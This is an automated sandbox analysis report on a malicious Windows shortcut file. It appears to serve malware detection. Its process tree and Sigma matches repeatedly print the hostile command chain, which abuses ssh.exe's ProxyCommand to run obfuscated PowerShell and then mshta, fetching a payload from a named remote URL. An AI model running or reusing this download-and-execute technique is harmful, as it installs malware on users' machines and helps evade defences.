Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test.lnk.download.lnk

Overview

General Information

Sample name:test.lnk.download.lnk
Analysis ID:1637536
MD5:18983de56bb363009528a125b8f4145f
SHA1:2b75d485f28365a6f669046637aedaaa47341f92
SHA256:8f54dfa771cd17aab3b5d53c82f92e35a30190b44a64ac86b5739758a1640ee7
Tags:62-133-61-75lnkuser-JAMESWT_MHT
Infos:

Detection

Score:80
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • ssh.exe (PID: 5864 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 872 cmdline: powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "mshta https://book.rollingvideogames.com/temp/kms.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 7300 cmdline: "C:\Windows\system32\mshta.exe" https://book.rollingvideogames.com/temp/kms.exe MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 7016 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://book.rollingvideogames.com/temp/kms.exe, CommandLine: "C:\Windows\system32\mshta.exe" https://book.rollingvideogames.com/temp/kms.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "mshta https://book.rollingvideogames.com/temp/kms.exe", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7212, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://book.rollingvideogames.com/temp/kms.exe, ProcessId: 7300, ProcessName: mshta.exe
Sigma detected: Lolbin Ssh.exe Use As Proxy
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')" ., ProcessId: 5864, ProcessName: ssh.exe
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process startedAuthor: frack113: Data: Command: powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe'), CommandLine: powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 5864, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe'), ProcessId: 872, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe'), CommandLine: powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 5864, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe'), ProcessId: 872, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7016, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-13T17:32:31.106022+010020197142Potentially Bad Traffic192.168.2.44971823.235.202.121443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://book.rollingvideogames.com/temp/kms.exeAvira URL Cloud: Label: malware
Source: https://book.rollingvideogames.com/temp/kms.exe...Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: test.lnk.download.lnkReversingLabs: Detection: 28%
Source: test.lnk.download.lnkVirustotal: Detection: 37%Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
Source: unknownHTTPS traffic detected: 23.235.202.121:443 -> 192.168.2.4:49718 version: TLS 1.2
Source: Joe Sandbox ViewASN Name: INMOTI-1US INMOTI-1US
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49718 -> 23.235.202.121:443
Source: global trafficHTTP traffic detected: GET /temp/kms.exe HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: book.rollingvideogames.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /temp/kms.exe HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: book.rollingvideogames.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: book.rollingvideogames.com
Source: svchost.exe, 00000003.00000002.2430316303.00000290FB28E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000003.00000003.1203688722.00000290FB418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1203688722.00000290FB418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000003.00000003.1203688722.00000290FB418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1203688722.00000290FB44D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1211972513.0000022CC40EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1211972513.0000022CC40D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1211972513.0000022CC40EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1211972513.0000022CC4538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://book.rol
Source: powershell.exe, 00000004.00000002.1211972513.0000022CC4538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://book.rolX
Source: powershell.exe, 00000004.00000002.1216172507.0000022CDC700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rolling
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/l
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E186000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2427858691.000001DE1E160000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2428781625.000001E61FEF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2427602400.000001DE1E130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exe
Source: powershell.exeString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exe$global:?
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exe%
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exe)
Source: mshta.exe, 00000005.00000002.2429576557.000001E620CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exe...
Source: powershell.exe, 00000004.00000002.1214726067.0000022CDC51B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exe0
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exe5
Source: powershell.exe, 00000004.00000002.1210154215.0000022CC25CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exe6yZ
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exe:
Source: powershell.exe, 00000004.00000002.1211320823.0000022CC4080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exeB
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exeC:
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exeNetCookies
Source: mshta.exe, 00000005.00000003.1231820700.000001DE1E19D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2427858691.000001DE1E186000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exeZ2tx
Source: powershell.exe, 00000004.00000002.1211027245.0000022CC26F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exeb
Source: mshta.exe, 00000005.00000002.2429576557.000001E620CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exeg
Source: powershell.exe, 00000004.00000002.1210154215.0000022CC255E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exei
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exeom
Source: powershell.exe, 00000004.00000002.1211972513.0000022CC4091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exep
Source: powershell.exe, 00000004.00000002.1210154215.0000022CC2540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exeu
Source: mshta.exe, 00000005.00000002.2427651275.000001DE1E140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exeveY
Source: mshta.exe, 00000005.00000002.2426648291.0000004EC9316000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exez
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231820700.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://book.rollingvideogames.com/temp/kms.exe~
Source: svchost.exe, 00000003.00000003.1203688722.00000290FB4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1203688722.00000290FB4C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: mshta.exe, 00000005.00000002.2427858691.000001DE1E1D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1231706410.000001DE1E1F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: svchost.exe, 00000003.00000003.1203688722.00000290FB4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownHTTPS traffic detected: 23.235.202.121:443 -> 192.168.2.4:49718 version: TLS 1.2

System Summary

barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: test.lnk.download.lnkLNK file: -o ProxyCommand="powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')" .
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.evad.winLNK@9/9@1/2
Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.sshJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11i41yxv.fx0.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: test.lnk.download.lnkReversingLabs: Detection: 28%
Source: test.lnk.download.lnkVirustotal: Detection: 37%
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')" .
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "mshta https://book.rollingvideogames.com/temp/kms.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://book.rollingvideogames.com/temp/kms.exe
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "mshta https://book.rollingvideogames.com/temp/kms.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://book.rollingvideogames.com/temp/kms.exeJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
